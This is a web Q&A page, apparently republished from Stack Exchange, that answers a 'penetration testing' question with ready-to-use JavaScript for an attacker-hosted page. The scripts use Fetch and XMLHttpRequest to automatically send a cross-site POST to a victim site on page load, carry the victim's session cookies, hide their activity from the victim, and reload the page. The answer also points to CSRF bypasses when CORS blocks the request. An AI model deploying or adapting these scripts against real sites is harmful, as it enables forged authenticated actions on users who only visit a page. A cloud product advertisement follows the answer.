You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

渗透测试需求:构造自定义Header的POST请求并实现页面重加载

Solution for Auto-Sending Custom Header POST Requests & Page Reload

I get it—traditional HTML forms fall short here because they don’t let you set custom HTTP headers like Authorization. Let’s fix that with modern JavaScript, which gives you full control over the request headers and behavior.

Why Traditional Forms Fail

The core flaw with using a standard <form> element is that browsers handle HTTP headers automatically for form submissions. You can’t manually inject custom headers like Authorization—the browser only sends standard headers like Content-Type or Cookie based on form settings. This makes forms useless for your use case.

Working Implementation with Fetch API

Add this script to your www.attacker.com page. It will automatically send the POST request when a victim loads the page, then reload the page regardless of whether the request succeeded or failed:

// Run as soon as the page finishes loading
window.addEventListener('load', async () => {
  const targetEndpoint = 'https://www.victim.com/your-target-path'; // Replace with the actual endpoint
  const authToken = 'xxxxx'; // Your custom Authorization token

  // Build your request body (adjust format to match what the target expects)
  const requestPayload = JSON.stringify({
    exampleField: 'exampleValue'
    // Add any other required body parameters here
  });

  try {
    // Send the POST request with custom headers
    const response = await fetch(targetEndpoint, {
      method: 'POST',
      headers: {
        'Authorization': authToken,
        'Content-Type': 'application/json' // Update this if the target uses form-data instead
      },
      body: requestPayload,
      credentials: 'include' // Include this if the target requires session cookies for authentication
    });

    // Optional: Log success for testing (won't be visible to the victim)
    console.log('Request sent:', response.status);
  } catch (error) {
    // Catch errors like network issues or CORS blocks (again, testing-only)
    console.error('Request failed:', error);
  } finally {
    // Force page reload after the request attempt
    window.location.reload();
  }
});

Key Notes for Adjustments

  • Request Body Format: If the target expects form-encoded data instead of JSON, swap out the Content-Type and payload:
    const requestPayload = new URLSearchParams({
      exampleField: 'exampleValue'
    });
    // Update headers to:
    headers: {
      'Authorization': authToken,
      'Content-Type': 'application/x-www-form-urlencoded'
    }
    
  • CORS Considerations: If the target site has strict CORS policies, the browser might block the request. For penetration testing, this could mean you need to check if the target allows cross-origin requests with custom headers, or if you can leverage CSRF bypasses (though CSRF typically works with standard form submissions, not custom headers).
  • Credentials: Use credentials: 'include' only if you need to send the victim’s session cookies to the target (e.g., for authenticated actions). If not, you can omit this or set it to 'same-origin'.

Alternative: XMLHttpRequest (Legacy Support)

If you need to support older browsers that don’t have Fetch API, use this XHR version instead:

window.addEventListener('load', () => {
  const xhr = new XMLHttpRequest();
  xhr.open('POST', 'https://www.victim.com/your-target-path');
  
  // Set custom headers
  xhr.setRequestHeader('Authorization', 'xxxxx');
  xhr.setRequestHeader('Content-Type', 'application/json');

  xhr.onload = () => {
    // Reload after request completes
    window.location.reload();
  };
  
  xhr.onerror = () => {
    // Reload even if there's an error
    window.location.reload();
  };

  // Send the request body
  xhr.send(JSON.stringify({ exampleField: 'exampleValue' }));
});

内容的提问来源于stack exchange,提问作者LuchinQG

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.05.20 06:56:21